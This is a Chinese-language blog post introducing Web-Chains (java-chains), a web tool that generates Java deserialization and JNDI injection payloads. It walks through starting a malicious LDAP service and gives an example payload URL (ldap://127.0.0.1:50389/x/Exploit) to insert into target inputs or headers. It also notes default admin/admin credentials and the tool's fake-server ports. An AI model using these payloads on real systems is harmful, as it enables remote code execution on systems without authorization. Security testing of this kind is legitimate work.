'%3e%3cpath%20d='M9%2021H15'%20stroke='black'%20stroke-width='2'%20stroke-linecap='round'%20stroke-linejoin='round'/%3e%3cpath%20d='M5.25001%209.75C5.25001%207.95979%205.96116%206.2429%207.22703%204.97703C8.4929%203.71116%2010.2098%203%2012%203C13.7902%203%2015.5071%203.71116%2016.773%204.97703C18.0388%206.2429%2018.75%207.95979%2018.75%209.75C18.75%2013.1081%2019.5281%2015.8063%2020.1469%2016.875C20.2126%2016.9888%2020.2472%2017.1179%2020.2474%2017.2493C20.2475%2017.3808%2020.2131%2017.5099%2020.1475%2017.6239C20.082%2017.7378%2019.9877%2017.8325%2019.8741%2017.8985C19.7604%2017.9645%2019.6314%2017.9995%2019.5%2018H4.50001C4.36874%2017.9992%204.23997%2017.964%204.12659%2017.8978C4.0132%2017.8317%203.91916%2017.7369%203.85387%2017.6231C3.78858%2017.5092%203.75432%2017.3801%203.75452%2017.2489C3.75472%2017.1176%203.78937%2016.9887%203.85501%2016.875C4.47282%2015.8063%205.25001%2013.1072%205.25001%209.75Z'%20stroke='black'%20stroke-width='2'%20stroke-linecap='round'%20stroke-linejoin='round'/%3e%3c/g%3e%3cdefs%3e%3cclipPath%20id='clip0_4762_133'%3e%3crect%20width='24'%20height='24'%20fill='white'/%3e%3c/clipPath%3e%3c/defs%3e%3c/svg%3e)
'%3e%3cpath%20d='M24%200H0V24H24V0Z'%20fill='white'%20fill-opacity='0.01'/%3e%3cpath%20d='M12%2011C14.2091%2011%2016%209.20914%2016%207C16%204.79086%2014.2091%203%2012%203C9.79086%203%208%204.79086%208%207C8%209.20914%209.79086%2011%2012%2011Z'%20stroke='black'%20stroke-width='2'%20stroke-linecap='round'%20stroke-linejoin='round'/%3e%3cpath%20d='M4%2021V20.4857C4%2018.5655%204%2017.6055%204.38753%2016.872C4.72841%2016.2269%205.27235%2015.7024%205.94138%2015.3737C6.70196%2015%207.6976%2015%209.68889%2015H14.3111C16.3024%2015%2017.298%2015%2018.0586%2015.3737C18.7276%2015.7024%2019.2716%2016.2269%2019.6125%2016.872C20%2017.6055%2020%2018.5655%2020%2020.4857V21'%20stroke='black'%20stroke-width='2'%20stroke-linecap='round'%20stroke-linejoin='round'/%3e%3c/g%3e%3cdefs%3e%3cclipPath%20id='clip0_4762_139'%3e%3crect%20width='24'%20height='24'%20fill='white'/%3e%3c/clipPath%3e%3c/defs%3e%3c/svg%3e)
Web-Chains : 让Java漏洞测试变得简单的神器
天天
发布于295天前龙猫也是猫
## 这是什么东西? Web Chains,又名 java-chains 项目,就是一个专门为Java安全测试而生的Web平台。它能快速生成各种Java Payload,方便测试JNDI注入、MySQL JDBC反序列化、JRMP反序列化等漏洞。 想象一下,以前你要测试Java反序列化漏洞,得手动写一堆复杂的代码,各种依赖库搞得你头大。现在有了Java Chains,点几下鼠标就能生成你想要的Payload,简直不要太爽。 不像那些命令行工具,Java Chains提供了直观的Web界面。 就算你是刚入门的小白,看着界面点点点就能用起来。 https://appstore.lazycat.cloud/#/shop/detail/in.zhaoj.webchains ## 快速上手 应用安装后,打开登录页,用户名/密码: admin/admin  进入主页面  **实战演练——JNDI注入** 假设你想测试一个应用是否存在JNDI注入漏洞。 启动一个恶意LDAP服务:在java-chains的控制台里,找到“JNDI Injection”模块。  第一步:确认监听IP和端口 IP Address(Reverse IP):这里填入你的服务器IP地址。如果你的java-chains就跑在本地,可以保持默认的 127.0.0.1。如果你想让一个远程目标去连接你的服务,这里就需要填写你的公网IP地址。 HTTP Port、LDAP Port、LDAPS Port、RMI Port:这些是java-chains用来监听的端口。如果你没有特殊的端口占用,保持默认值就行。 Auto Fetch IP:这个开关打开后,java-chains会尝试自动获取你的公网IP  中间部分,你会看到几个端口对应的“Start”按钮。你需要根据你想要使用的JNDI注入方式来选择启动哪个服务。 如果你想使用LDAP协议:点击 LDAP Port 旁边的 Start 按钮。 如果你想使用RMI协议:点击 RMI Port 旁边的 Start 按钮。 通常情况下,LDAP是最常用的。点击 LDAP Port 旁边的 Start 后,java-chains就会启动一个恶意的LDAP服务,等待目标应用来连接。  服务启动后,java-chains会自动为你生成一个JNDI注入的Payload URL。 在图片中,你可以看到左侧菜单栏有 JndiBasicPayload 等多个选项。 你可以点击这些选项,然后根据你的测试需求,选择一个具体的Payload。  java-chains会为你生成一个链接,比如 ldap://127.0.0.1:50389/x/Exploit。 你需要做的就是,想办法把这个链接作为输入,发送给目标应用。例如: 如果目标应用有一个输入框,你可以把链接粘贴进去。 如果目标应用通过HTTP Header获取某个值,你可以把链接放在Header里。 在页面的 Status 区域,你会看到实时的日志信息。 如果目标应用存在JNDI注入漏洞,并且成功连接到了你的恶意LDAP服务,这里就会显示连接日志。  这些端口各有用途: - **8011**:主要的Web管理界面 - **58080**:JNDI HTTP字节码服务 - **50389/50388**:JNDI LDAP/RMI服务 - **3308**:伪造的MySQL服务器 - **13999**:JRMPListener - **50000/11527**:HTTP/TCP服务器  记住这只是测试工具,用完记得及时关闭相关端口。别让这些服务长期暴露在外网,容易被别人利用。 ## 总结 Java Chains 是个不错的工具,特别是对于经常需要进行Java安全测试的朋友来说。 它把原本复杂的Payload生成过程变得简单直观,大大提高了测试效率。
评论
0暂无评论